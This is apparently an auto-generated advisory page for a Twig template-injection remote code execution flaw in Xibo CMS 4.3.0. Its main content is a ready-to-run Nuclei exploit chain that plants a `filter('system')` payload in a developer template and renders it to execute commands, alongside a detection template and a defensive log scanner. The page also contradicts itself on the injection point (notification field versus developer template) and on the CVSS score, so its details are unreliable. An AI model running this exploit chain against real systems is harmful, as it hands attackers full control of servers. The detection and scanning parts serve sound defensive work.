[webapps] Xibo CMS 4.3.0 - RCE via SSTI
CVE-2025-62639 / CVE-2025-62369
Xibo CMS 4.3.0: Remote Code Execution via SSTI
Critical · CVSS 9.8

📋 Vulnerability summary

| CVE | CVE-2025-62639 / CVE-2025-62369 |
|---|---|
| Vulnerability type | Server-side template injection (SSTI) leading to RCE |
| Affected version | Xibo CMS 4.3.0 |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-04-29 |
| Submitted by | Cristian Branet |
| Source | Exploit-DB original entry |
🔬 Root cause
When rendering notification content, Xibo CMS does not sanitize user-controlled template input. An attacker can inject Twig/Smarty expressions into the template, which the engine evaluates, ultimately leading to code execution.

🎯 Attack scenario
1. The attacker needs administrator privileges or the permission to create notifications.
2. When creating a notification, the malicious SSTI payload is placed in the notification content field.
3. When the system renders the notification, the payload is evaluated, triggering remote code execution. Success is indicated by arbitrary command execution on the server (for example a reverse shell or a written webshell).

💥 Impact
An attacker can achieve remote code execution and take full control of the server, leading to data theft, ransomware deployment, lateral movement and similar severe consequences.
⚔️ Nuclei exploit template
The following is an exploitation template in standard Nuclei v3 format that can be used directly to verify the vulnerability:
```yaml
id: CVE-2025-62639-exploit

info:
  name: Xibo CMS - Authenticated Remote Code Execution via SSTI
  author: ai
  severity: critical
  description: Exploits CVE-2025-62639 in Xibo CMS (< 4.3.1) to achieve authenticated remote code execution via Server-Side Template Injection in the developer template feature. Requires a valid PHPSESSID.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-62639
    - https://cristibtz.github.io/posts/CVE-2025-62369/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-62639
  tags: xibo,cms,rce,ssti,authenticated

variables:
  session: "{{session}}" # Must be provided by user, e.g., -var 'session=abc123'
  cmd: "id"

http:
  # Step 1: fetch the dashboard to obtain the XSRF token and a timestamp
  - raw:
      - |
        GET /statusdashboard HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{session}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36

    extractors:
      - type: regex
        name: xsrf_token
        part: body
        regex:
          - 'name="token" content="([a-f0-9]+)"'
        group: 1
      - type: kval
        name: timestamp
        internal: true
        part: header
        kval:
          - Date

  # Step 2: create a developer template
  - raw:
      - |
        POST /developer/template HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{session}}
        X-XSRF-TOKEN: {{xsrf_token}}
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        templateId=exploit_poc_{{timestamp}}&title=Template+for+PoC&dataType=article&copyTemplateId=&showIn=layout

    extractors:
      - type: json
        name: module_template_id
        part: body
        json:
          - '.id'
      - type: json
        name: name
        part: body
        json:
          - '.templateId // "exploit_poc_{{timestamp}}"'

  # Step 3: update the template with the Twig payload
  - raw:
      - |
        PUT /developer/template/{{module_template_id}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{session}}
        X-XSRF-TOKEN: {{xsrf_token}}
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        templateId={{name}}&title=Template+for+PoC+-+{{name}}&dataType=article&showIn=layout&enabled=on&developer-template-properties=%5B%5D&properties=%5B%5D&twig=<div+style%3D"background%3A+red%3B+color%3A+white%3B+font-size%3A+24px%3B+padding%3A+20px%3B">Command+Execution%3A+{{%5B%22{{cmd}}%22%5D%7Cfilter(%27system%27)}}+<br><%2Fdiv>&hbs=&style=&head=&onTemplateRender=&onTemplateVisible=&isInvalidateWidget=on

  # Step 4: create a layout template to obtain a playlist
  - raw:
      - |
        POST /template HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{session}}
        X-XSRF-TOKEN: {{xsrf_token}}
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        folderId=1&name=exploit_poc_template_{{timestamp}}&tags=&tagValueInput=&resolutionId=1&description=Exploit+template

    extractors:
      - type: json
        name: normal_template_id
        part: body
        json:
          - '.id'
      - type: json
        name: layout_id
        part: body
        json:
          - '.data.layoutId'
      - type: json
        name: region_id
        part: body
        json:
          - '.data.regions[0].regionId'
      - type: json
        name: playlist_id
        part: body
        json:
          - '.data.regions[0].regionPlaylist.playlistId'

  # Step 5: add a widget that uses the developer template
  - raw:
      - |
        POST /playlist/widget/rss-ticker/{{playlist_id + 1}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{session}}
        X-XSRF-TOKEN: {{xsrf_token}}
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        templateId={{name}}

    extractors:
      - type: json
        name: widget_id
        part: body
        json:
          - '.id'

  # Step 6: render the widget preview, which evaluates the template
  - raw:
      - |
        GET /playlist/widget/resource/{{playlist_id + 1}}/{{widget_id}}?preview=1&isEditor=1 HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{session}}
        X-XSRF-TOKEN: {{xsrf_token}}
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "root:"
        condition: or
      - type: status
        status:
          - 200
```

🔍 Nuclei detection template
The following detection template is used to determine whether a target is affected:
```yaml
id: CVE-2025-62639-detection

info:
  name: Xibo CMS - Version Detection
  author: ai
  severity: info
  description: Detects Xibo CMS version to check if it is vulnerable to CVE-2025-62639 (SSTI RCE) affecting versions < 4.3.1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-62639
    - https://github.com/xibosignage/xibo-cms/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-62639
  tags: xibo,cms,detection

http:
  - method: GET
    path:
      - "{{BaseURL}}/login"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Xibo CMS"
          - "content=\"Xibo"
      - type: word
        part: body
        words:
          - "v4.3.0"

    extractors:
      - type: regex
        part: body
        name: version
        regex:
          - 'Xibo CMS v([0-9]+\.[0-9]+\.[0-9]+)'
        group: 1
```

🛡️ Remediation
Upgrade to Xibo CMS 4.3.1 or later. Temporary mitigations: disable rendering of user-supplied templates in the notification module, or enable the template engine's sandbox mode and restrict dangerous functions.
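The root-cause and remediation sections above both come down to one question for a defender: is template-controlled text reaching PHP callables? The script below is an added example written for this page, not code from Xibo or from the Exploit-DB entry. It extracts the `twig` form field from constructed, tab-separated proxy log records (timestamp, user, method, path, request body; the log format is an assumption), URL-decodes it, and flags the Twig constructs that let a template invoke PHP functions, including the `filter('system')` callback pattern the exploit template uses. The same `find_dangerous_constructs` check can be run as a pre-save validation on template submissions. The list of flagged constructs is this example's own choice and is not exhaustive.

```python
import re
from urllib.parse import parse_qs

# Twig constructs that hand template-controlled strings to PHP callables.
# The first alternative covers the pattern this advisory's payload uses: an
# array piped through filter()/map()/reduce()/sort() with a PHP function name
# as the callback. The others catch direct call syntax and Twig features that
# load other templates or reflect on objects. The list is an assumption for
# this example and is deliberately conservative rather than complete.
DANGEROUS_TWIG = re.compile(
    r"""\|\s*(?:filter|map|reduce|sort)\s*\(\s*['"](?:system|exec|passthru|shell_exec|popen|proc_open|eval|assert)['"]"""
    r"""|\b(?:system|exec|passthru|shell_exec|popen|proc_open)\s*\("""
    r"""|\b_self\b|\battribute\s*\(|\bsource\s*\(|\binclude\s*\(""",
    re.IGNORECASE,
)


def extract_twig_field(form_body: str) -> str:
    """Return the URL-decoded `twig` field of a form-encoded body ('' if absent)."""
    fields = parse_qs(form_body, keep_blank_values=True)
    return fields.get("twig", [""])[0]


def find_dangerous_constructs(template_source: str) -> list[str]:
    """Return the dangerous Twig constructs found in a template, de-duplicated and sorted."""
    return sorted({m.group(0) for m in DANGEROUS_TWIG.finditer(template_source)})


def scan_request_log(lines) -> list[dict]:
    """Scan body-capturing proxy log lines (constructed format: five tab-separated
    fields) and return one finding per request whose twig field is dangerous."""
    findings = []
    for line in lines:
        parts = line.rstrip("\n").split("\t", 4)
        if len(parts) != 5:
            continue  # malformed record; a production scanner would count these
        timestamp, user, method, path, body = parts
        # Every body is scanned rather than only /developer/template routes, so the
        # check does not depend on keeping an exact list of template-editing endpoints.
        constructs = find_dangerous_constructs(extract_twig_field(body))
        if constructs:
            findings.append({
                "timestamp": timestamp,
                "user": user,
                "method": method,
                "path": path,
                "constructs": constructs,
            })
    return findings


# Constructed sample log (not real traffic): a benign developer template, a
# template carrying the filter('system') payload pattern, and an unrelated
# layout-template creation with no twig field.
SAMPLE_LOG = [
    "2026-05-07T10:11:58Z\talice\tPUT\t/developer/template/12\t"
    "templateId=dev_tpl&title=Dev&twig=%7B%7B+title+%7D%7D+%3Cp%3E%7B%7B+body%7Cescape+%7D%7D%3C%2Fp%3E",
    "2026-05-07T10:12:01Z\tmallory\tPUT\t/developer/template/13\t"
    "templateId=exploit_poc_1&title=Template+for+PoC&twig=%3Cdiv%3ECommand+Execution%3A+"
    "%7B%7B%5B%22id%22%5D%7Cfilter(%27system%27)%7D%7D%3C%2Fdiv%3E&hbs=&style=",
    "2026-05-07T10:12:05Z\talice\tPOST\t/template\tfolderId=1&name=weekly_menu&tags=&resolutionId=1",
]


if __name__ == "__main__":
    for finding in scan_request_log(SAMPLE_LOG):
        print(f"{finding['timestamp']} {finding['user']} {finding['method']} "
              f"{finding['path']} -> {finding['constructs']}")
```

Running the block reports only the second record, with `|filter('system'` as the flagged construct; the benign `body|escape` template passes because `escape` is not in the callback list. Because the check operates on the decoded field, it is unaffected by how the client percent-encodes the payload.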
📎 References
- https://nvd.nist.gov/vuln/detail/CVE-2025-62639
- https://nvd.nist.gov/vuln/detail/CVE-2025-62369
- Exploit-DB original entry

⚠️ This article is based on public vulnerability databases and is provided for security research and defensive reference only. Generated: 2026-05-07 05:41 | Source: Exploit-DB